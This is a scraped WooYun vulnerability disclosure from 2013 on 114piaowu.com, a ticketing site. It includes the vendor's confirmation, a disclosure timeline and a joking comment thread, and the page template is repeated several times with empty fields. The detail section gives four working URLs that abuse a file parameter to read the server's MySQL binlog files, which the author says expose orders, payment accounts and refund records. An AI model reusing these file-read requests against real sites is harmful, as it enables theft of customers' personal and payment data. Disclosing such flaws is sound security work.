114票务网发现后门可读取几十万客户资料外泄（38个数据库可能被拖）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-033285

漏洞标题：114票务网发现后门可读取几十万客户资料外泄（38个数据库可能被拖）

漏洞作者： X务院

提交时间：2013-08-02 13:21

修复时间：2013-09-16 13:22

公开时间：2013-09-16 13:22

漏洞类型：用户资料大量泄漏

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-08-02：细节已通知厂商并且等待厂商处理中
2013-08-02：厂商已经确认，细节仅向厂商公开
2013-08-12：细节向核心白帽子及相关领域专家公开
2013-08-22：细节向普通白帽子公开
2013-09-01：细节向实习白帽子公开
2013-09-16：细节向公众公开

简要描述：

114票务网数据库越权访问（38个数据库可能被拖）

详细说明：

菊花：
http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000002
http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000003
http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000001
http://jingdian.114piaowu.com/SuZhou/cqq_index.jsp?sort=1&file=%2Fdata%2Fmysql%2Fmysql-bin.000004
注意：bin.0000后面的数值我一直尝试到了38 也就是38个数据库涉及网站各个方面擦！
从订单到票务到用户支付账号到退票信息.............

漏洞证明：

修复方案：

版权声明：转载请注明来源 X务院@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2013-08-02 17:03

厂商回复：

收到

漏洞评价：

2013-08-02 13:30 | 酱油哥 ( 实习白帽子 | Rank:53 漏洞数:3 | 打酱油。)

求真相。
2013-08-02 13:41 | 国务院 ( 实习白帽子 | Rank:35 漏洞数:5 | 拥护党的纲领，遵守党的章程，履行党员义务...)

@酱油哥跟着前人的脚步 @党中央 @主席 @国防部我轻轻的就进来了！
2013-08-02 14:02 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在，梦在)

@国务院有这么多数据库？
2013-08-02 14:06 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

@带馅儿馒头呵呵告诉你吧支付数据库退票系统数据库订票者信息数据库。。。。。。。。。。。。前三个能有3个G 后面的数据库小的多了！我是跟着前人的脚步进去的
2013-08-02 14:08 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

@疯狗 @Finger @xsser 大大们俺求个闪电加精可以吗？发个洞不容易，得罪很多人，可能活不过今晚了.....满足俺的要求把
2013-08-02 14:35 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

@国防部你这个账号活不过今晚了
2013-08-02 14:37 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

@xsser 我被改名啦肿莫回事？ @X务院 @X中央 @X防部 @X监
2013-08-02 14:38 | 有妹子送上 ( 实习白帽子 | Rank:89 漏洞数:28 | 杭州最帅的男人)

@xsser 我还能活多少晚。
2013-08-02 14:38 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在，梦在)

@X防部杯具鸟，哈哈
2013-08-02 14:40 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

@带馅儿馒头目测 @X中央 @X监比我悲剧！他俩的ID被改的好喜感！
2013-08-02 14:40 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在，梦在)

@X防部不都是你马甲么？
2013-08-02 14:41 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

@带馅儿馒头这个真的不是！
2013-08-02 15:09 | niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

@X防部。。。。玩儿大了
2013-08-02 17:32 | X务院 ( 实习白帽子 | Rank:35 漏洞数:5 | 拥护党的纲领，遵守党的章程，履行党员义务...)

@疯狗怎么进不去社区了？是不是给我封了？啊
2013-08-02 18:25 | X中央 ( 路人 | Rank:24 漏洞数:4 | 中国共产党全国代表大会产生的中央权力机构...)

躺枪的路过
2013-08-03 09:57 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

@X中央 @X务院 @X防部好喜感

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-033285

漏洞标题：114票务网发现后门可读取几十万客户资料外泄（38个数据库可能被拖）

相关厂商：114piaowu.com

漏洞作者： X务院

提交时间：2013-08-02 13:21

修复时间：2013-09-16 13:22

公开时间：2013-09-16 13:22

漏洞类型：用户资料大量泄漏

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 X务院@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-033285

漏洞标题：114票务网发现后门可读取几十万客户资料外泄 （38个数据库可能被拖）

相关厂商：114piaowu.com

漏洞作者： X务院

提交时间：2013-08-02 13:21

修复时间：2013-09-16 13:22

公开时间：2013-09-16 13:22

漏洞类型：用户资料大量泄漏

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-033285"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 X务院@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞标题：114票务网发现后门可读取几十万客户资料外泄（38个数据库可能被拖）

Tags标签：无

4人收藏收藏
分享漏洞：